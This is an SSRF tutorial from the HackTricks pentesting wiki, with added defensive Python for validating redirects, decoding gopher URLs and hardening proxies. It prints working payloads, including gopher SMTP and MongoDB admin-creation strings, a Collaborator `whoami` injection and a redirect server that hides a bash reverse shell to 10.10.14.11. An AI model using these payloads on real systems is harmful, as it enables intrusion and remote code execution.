SSRF (Server Side Request Forgery)

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

A Server-side Request Forgery (SSRF) vulnerability occurs when an attacker manipulates a server-side application into making HTTP requests to a domain of their choosing. This vulnerability exposes the server to external requests directed by the attacker.

Capture SSRF

The first thing you need to do is capture an SSRF interaction generated by you. To capture an HTTP or DNS interaction you can use tools such as:

Whitelisted Domains Bypass

Usually you will find that the SSRF only works on certain whitelisted domains or URLs. The following page has a compilation of techniques to try to bypass that whitelist:

URL Format Bypass

Bypass via open redirect

If the server is correctly protected you could bypass all the restrictions by exploiting an Open Redirect inside the web page. Because the web page will allow SSRF to the same domain and will probably follow redirects, you can exploit the Open Redirect to make the server access any internal resource.
Read more here: https://portswigger.net/web-security/ssrf
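As an added example (Python, not HackTricks' code): an outbound fetcher whose allowlist policy is applied to every hop of a redirect chain, so an open redirect on a whitelisted host cannot steer the request to an internal address, non-HTTP schemes such as gopher:// and file:// are refused, userinfo tricks (https://good.com@evil.com/) are rejected, and only the standard 3xx codes are followed (the odd 305..310 codes discussed further down under "From blind to full abusing status codes" are refused outright). The `opener` callback and the `SAMPLE_RESPONSES` table are constructed stand-ins for the network; `api.example.com` is an assumed allowlisted host.

```python
"""Allowlist-based outbound fetcher that re-validates every redirect hop.

Added example (not HackTricks' code). The upstream `opener` is injectable so
the policy can be exercised offline; the sample responses are constructed.
"""
from urllib.parse import urlsplit, urljoin

ALLOWED_SCHEMES = {"http", "https"}
FOLLOWABLE = {301, 302, 303, 307, 308}   # standard redirect codes only
MAX_REDIRECTS = 3


class SsrfBlocked(Exception):
    """Raised when a hop of the fetch violates the outbound policy."""


def validate_url(url, allowed_hosts):
    """Return the parsed URL if scheme and host are on the allowlist, else raise."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise SsrfBlocked(f"scheme {parts.scheme!r} is not allowed")
    if "@" in parts.netloc:                 # https://api.example.com@evil.com/ and friends
        raise SsrfBlocked("userinfo in authority is not allowed")
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in allowed_hosts:
        raise SsrfBlocked(f"host {host!r} is not on the allowlist")
    return parts


def safe_fetch(url, allowed_hosts, opener, max_redirects=MAX_REDIRECTS):
    """Fetch `url`, following only standard redirects and validating each hop.

    `opener(url)` must return (status, headers_dict, body). A real deployment
    would wrap an HTTP client with automatic redirects disabled, e.g.
    requests.get(url, allow_redirects=False), so that this loop sees every hop.
    """
    hops = []
    current = url
    for _ in range(max_redirects + 1):
        validate_url(current, allowed_hosts)          # policy check on EVERY hop, not just the first
        status, headers, body = opener(current)
        hops.append((current, status))
        if status in FOLLOWABLE:
            location = next((v for k, v in headers.items() if k.lower() == "location"), None)
            if not location:
                raise SsrfBlocked(f"{status} without a Location header")
            current = urljoin(current, location)      # relative Locations resolve against the current URL
            continue
        if 300 <= status < 400:
            # 305/306/310-style codes are never followed (see the blind-SSRF section of this page)
            raise SsrfBlocked(f"refusing to follow non-standard redirect {status}")
        return status, body, hops
    raise SsrfBlocked(f"more than {max_redirects} redirects")


def try_fetch(url, allowed_hosts, opener):
    """Convenience wrapper: ('ok', status, body) or ('blocked', reason)."""
    try:
        status, body, _hops = safe_fetch(url, allowed_hosts, opener)
        return ("ok", status, body)
    except SsrfBlocked as exc:
        return ("blocked", str(exc))


# Constructed responses standing in for a network; keys are the URLs the opener receives.
SAMPLE_RESPONSES = {
    "https://api.example.com/data": (200, {"Content-Type": "application/json"}, b'{"ok":true}'),
    # an open redirect on the allowlisted host pointing at an internal service
    "https://api.example.com/go?u=http://127.0.0.1/admin": (302, {"Location": "http://127.0.0.1/admin"}, b""),
    # a relative redirect that stays on the allowlisted host
    "https://api.example.com/old": (301, {"Location": "/data"}, b""),
    # a redirect using a non-standard 3xx code
    "https://api.example.com/weird": (305, {"Location": "/data"}, b""),
    # a redirect loop
    "https://api.example.com/loop": (302, {"Location": "/loop"}, b""),
}


def sample_opener(url):
    return SAMPLE_RESPONSES[url]


ALLOWED = {"api.example.com"}

if __name__ == "__main__":
    for u in SAMPLE_RESPONSES:
        print(u, "->", try_fetch(u, ALLOWED, sample_opener))
```

The important property is that the check runs once per hop: validating only the first URL and then letting the HTTP library follow redirects on its own is exactly the gap the open-redirect trick above exploits.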

Protocols

  • file://
  • The URL scheme file:// is referenced, pointing directly to /etc/passwd: file:///etc/passwd
  • dict://
  • The DICT URL scheme is described as being used for accessing definitions or word lists via the DICT protocol. The example given shows a constructed URL targeting a specific word, database, and entry number, as well as an instance of a PHP script being misused to connect to a DICT server using attacker-provided credentials: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
  • SFTP://
  • Identified as a protocol for secure file transfer over secure shell; the example shows how a PHP script could be exploited to connect to a malicious SFTP server: url=sftp://generic.com:11111/
  • TFTP://
  • Trivial File Transfer Protocol, working over UDP, is mentioned with an example of a PHP script designed to send a request to a TFTP server. The TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
  • LDAP://
  • This segment covers the Lightweight Directory Access Protocol, emphasizing its use for managing and accessing distributed directory information services over IP networks. As shown, you can interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
  • SMTP
  • A method is described for exploiting SSRF vulnerabilities to interact with SMTP services on localhost, including steps to reveal internal domain names and further investigative actions based on that information.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
3. search http://internaldomain.com on github, find subdomains
4. connect
  • Curl URL globbing - WAF bypass
  • If the SSRF is executed by curl, curl has a feature called URL globbing that could be useful to bypass WAFs. For example, in this writeup you can find this example of a path traversal via the file protocol:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • Gopher://
  • The capability of the Gopher protocol to specify the IP, port, and bytes for server communication is discussed, along with tools like Gopherus and remote-method-guesser for crafting payloads. Two distinct usages are illustrated:

Gopher://

Using this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically exploit an SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP - Back connect to 1337

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>

Now query it:
https://example.com/?q=http://evil.com/redirect.php

Gopher MongoDB - Create a user with username=admin, password=admin123 and permission=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%07%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00%00%00administrator%00%00%00%00'
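When a gopher:// URL like the ones above turns up in an application log or a WAF alert, the useful question for a responder is "what would the server actually have sent to that host and port?". The following added example (Python, not HackTricks' or Gopherus' code) decodes a gopher URL into host, port, item type and raw payload bytes, handling the double percent-encoding (`%250d%250a` -> `%0d%0a` -> CRLF) that appears when the URL travelled through a `url=` query parameter. The two sample inputs are the SMTP and MongoDB payloads shown on this page, embedded as constructed test data; `mongo_wire_header` parses the standard 16-byte MongoDB message header so the decoded bytes can be sanity-checked against their own length prefix.

```python
"""Decode a gopher:// SSRF URL into the bytes the server would have sent.

Added example (not HackTricks' code) for reviewing logged SSRF attempts.
Sample URLs are the SMTP and MongoDB payloads shown on this page.
"""
from urllib.parse import urlsplit, parse_qs, unquote_to_bytes


def gopher_url_from_query(query_string, param="url"):
    """Pull the gopher URL out of a query string the way the web app would (one decode)."""
    values = parse_qs(query_string, keep_blank_values=True).get(param)
    if not values:
        raise ValueError(f"no {param!r} parameter in {query_string!r}")
    return values[0]


def parse_gopher_url(url, decode_rounds=1):
    """Return (host, port, gopher_type, payload_bytes) for a gopher:// URL.

    The first character of the selector is the gopher item type ('_' or 'x' in
    the payloads on this page); the rest is percent-decoded `decode_rounds`
    times. Use 1 for a URL that was already decoded once by the application
    (e.g. the output of gopher_url_from_query) and 2 for the raw query value.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "gopher":
        raise ValueError(f"not a gopher URL: {url!r}")
    selector = parts.path[1:] if parts.path.startswith("/") else parts.path
    if parts.query:                 # gopher has no query syntax: '?' and what follows are payload
        selector += "?" + parts.query
    gopher_type, payload = selector[:1], selector[1:]
    for _ in range(decode_rounds):
        payload = unquote_to_bytes(payload)
    return parts.hostname, parts.port or 70, gopher_type, bytes(payload)


def mongo_wire_header(payload):
    """Parse the 16-byte MongoDB wire header: (messageLength, requestID, responseTo, opCode)."""
    return tuple(int.from_bytes(payload[i:i + 4], "little") for i in range(0, 16, 4))


# Constructed samples: the query string of the SMTP payload and the raw MongoDB URL from this page.
SMTP_QUERY = "url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a"
MONGO_URL = "gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%07%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00%00%00administrator%00%00%00%00"

if __name__ == "__main__":
    host, port, gtype, payload = parse_gopher_url(gopher_url_from_query(SMTP_QUERY))
    print(f"{host}:{port} type={gtype!r}")
    for line in payload.decode("latin-1").splitlines():
        print("  >", line)
    host, port, gtype, payload = parse_gopher_url(MONGO_URL)
    print(f"{host}:{port} type={gtype!r} {len(payload)} bytes, header={mongo_wire_header(payload)}")
```

For the MongoDB payload the first header field (160) equals the decoded length and the opCode is 2013 (OP_MSG), which is a quick way to confirm that a decoded blob is a well-formed wire message rather than a truncated log line.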

SSRF via Referrer header & Others

Analytics software on servers often logs the Referrer header to track incoming links, a practice that inadvertently exposes applications to Server-Side Request Forgery (SSRF) vulnerabilities. This is because such software may visit external URLs mentioned in the Referrer header to analyze the referral site's content. To uncover these vulnerabilities, the Burp Suite plugin "Collaborator Everywhere" is advised, leveraging the way analytics tools process the Referer header to identify potential SSRF attack surfaces.

SSRF via SNI data from certificate

A misconfiguration that could enable the connection to any backend through a simple setup is illustrated with an example Nginx configuration:

stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}

In this configuration, the value from the Server Name Indication (SNI) field is directly utilized as the backend's address. This setup exposes a vulnerability to Server-Side Request Forgery (SSRF), which can be exploited by merely specifying the desired IP address or domain name in the SNI field. An exploitation example to force a connection to an arbitrary backend, such as internal.host.com, using the openssl command is given below:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF via TLS AIA CA Issuers (Java mTLS)

Some TLS stacks will automatically fetch missing intermediate CAs by following the Authority Information Access (AIA) → CA Issuers URI embedded in the peer certificate. In Java, enabling -Dcom.sun.security.enableAIAcaIssuers=true while running an mTLS service makes the server dereference attacker-controlled URIs from the client certificate during the handshake, before any HTTP logic runs.

  • Requirements: mTLS enabled, Java AIA fetching enabled, attacker can present a client cert with a crafted AIA CA Issuers URI.
  • Triggering SSRF (Java 21 example):
java -Djava.security.debug=certpath \
-Dcom.sun.security.enableAIAcaIssuers=true \
-Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem

The Java certpath debug output shows CertStore URI:http://localhost:8080, and nc captures an HTTP request whose User-Agent is controllable via -Dhttp.agent, confirming SSRF during certificate validation.

  • DoS via file://: setting AIA CA Issuers to file:///dev/urandom on Unix-like hosts makes Java treat it as a CertStore and read unbounded random bytes, pegging a CPU core and blocking subsequent connections even after the client disconnects.

SSRF via CSS Pre-Processors

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation the LESS engine will fetch the resources referenced in @import statements and inline their contents into the resulting CSS when the (inline) option is used.

Check how to exploit it in:

LESS Code Injection

Wget file upload

SSRF with Command Injection

It might be worth trying a payload like: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFs Rendering

If the web page is automatically creating a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF, and you will be able to abuse an SSRF. Find more information here.

From SSRF to DoS

Create several sessions and try to download heavy files exploiting the SSRF from those sessions.

SSRF PHP Functions

Check the following page for vulnerable PHP and even Wordpress functions:

PHP SSRF

SSRF Redirect to Gopher

For some exploitations you might need to send a redirect response (potentially to switch to a different protocol like gopher). Here you have two different python servers that respond with a redirect:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl


class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        # Answer every GET with a 301 whose Location is a gopher:// URL, so a
        # redirect-following SSRF client switches protocol on the next hop
        self.send_response(301)
        self.send_header("Location", (
            "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%"
            "20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c"
            "%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a"
        ))
        self.end_headers()


httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; wrap the listening socket with an SSLContext instead
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.pem")   # server.pem holds both key and certificate
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

Or the same with Flask (ssl_context='adhoc' needs the pyOpenSSL package installed):

from flask import Flask, redirect

app = Flask(__name__)


@app.route('/')
def root():
    # 301 to a gopher:// URL; the encoded bytes are the start of an HTTP request to WinRM on port 5985
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)


if __name__ == "__main__":
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Misconfigured proxies to SSRF

Technique from this post.

Flask

Vulnerable Flask proxy code:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # The client-supplied path is concatenated straight onto SITE_NAME, with no
    # separator and no encoding, so the client controls what follows the host
    return get(f'{SITE_NAME}{path}').content


if __name__ == "__main__":
    app.run(threaded=False)

Flask allows using @ as the initial character, which allows making the initial host name the username and injecting a new one. Attack request:

GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Vulnerable code:

It was discovered that it's possible to start the path of the request with the character ;, which then allows using @ and injecting a new host to access. Attack request:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server

Vulnerable PHP code:

<?php

// The snippet on this page starts after these two assignments; the values
// below are assumptions that reproduce the described behaviour
$site = 'https://google.com';            // assumed fixed upstream, as in the Flask example
$current_uri = $_SERVER['REQUEST_URI'];  // assumed: the client's raw request target

$proxy_site = $site.$current_uri;        // plain concatenation, no separator or encoding
var_dump($proxy_site);

echo "\n\n";

$response = file_get_contents($proxy_site);
var_dump($response);
?>

PHP allows using the char * before a slash in the URL path, but it has other limitations: it can only be used for the root pathname / and dots . are not allowed before the first slash, so it is necessary to use a dot-less hex-encoded IP address, for example:

GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
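All three proxies above fail the same way: the client's request target is glued onto the upstream origin as a string, so `@`, `;` or `*` can turn the intended host into userinfo and a client-chosen host into the authority. The following added example (Python, not the post's or the projects' code) places `naive_join`, the concatenation the Flask and PHP snippets use, beside `safe_join`, which percent-encodes the client path, always inserts a `/` separator and then re-parses the result to confirm the authority is unchanged. The upstream `https://google.com` is the `SITE_NAME` from the Flask snippet; the three paths are the attack requests shown above.

```python
"""Vulnerable vs. hardened upstream URL construction for a reverse proxy.

Added example (not the post's code). `naive_join` reproduces the concatenation
shown on this page; `safe_join` is the hardened form.
"""
from urllib.parse import urlsplit, quote

UPSTREAM = "https://google.com"   # SITE_NAME from the vulnerable Flask snippet


class UpstreamMismatch(Exception):
    pass


def naive_join(upstream, client_path):
    """The vulnerable pattern: f'{SITE_NAME}{path}' with no separator and no encoding."""
    return f"{upstream}{client_path}"


def safe_join(upstream, client_path):
    """Build an upstream URL in which the client can only influence the path."""
    base = urlsplit(upstream)
    # 1. percent-encode everything the client sent except '/', so '@', ';', '*',
    #    '?' and '#' lose their URL meaning (a real proxy would forward the query
    #    string separately, from request.query_string, rather than through here)
    encoded = quote(client_path.lstrip("/"), safe="/")
    # 2. always put a '/' between authority and path, so 'google.com@evil.com'
    #    can never be parsed as an authority
    candidate = f"{base.scheme}://{base.netloc}/{encoded}"
    # 3. defence in depth: re-parse and confirm scheme and authority are unchanged
    result = urlsplit(candidate)
    if result.scheme != base.scheme or result.netloc != base.netloc:
        raise UpstreamMismatch(f"{candidate!r} does not target {upstream!r}")
    return candidate


def upstream_host(url):
    """Host a URL-parsing HTTP client would connect to."""
    return urlsplit(url).hostname


# Constructed inputs: the three attack request targets shown on this page.
ATTACK_PATHS = [
    "@evildomain.com/",        # Flask: the intended host becomes userinfo
    ";@evil.com/url",          # Spring Boot: ';' then '@'
    "*@0xa9fea9fe/",           # PHP built-in server: '*' then '@', dot-less hex IP
]

if __name__ == "__main__":
    for path in ATTACK_PATHS:
        print(f"{path!r:22} naive -> {upstream_host(naive_join(UPSTREAM, path))!r:18} "
              f"safe -> {upstream_host(safe_join(UPSTREAM, path))!r}")
```

Step 3 is deliberately redundant with steps 1 and 2: if a later refactor drops the encoding, the mismatch check still refuses to proxy a request whose authority changed.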

DNS Rebinding CORS/SOP bypass

If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:

CORS - Misconfigurations & Bypass

Automated DNS Rebinding

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

Check out also the publicly running server at http://rebind.it/singularity.html

DNS Rebinding + TLS Session ID/Session ticket

Requirements:

  • SSRF
  • Outbound TLS sessions
  • Stuff on local ports

Attack:

  1. Ask the user/bot to access a domain controlled by the attacker
  2. The TTL of the DNS is 0 sec (so the victim will check the IP of the domain again soon)
  3. A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
  4. The domain will start an infinite loop of redirects against itself. The goal of this is to make the user/bot access the domain until it performs again a DNS request of the domain.
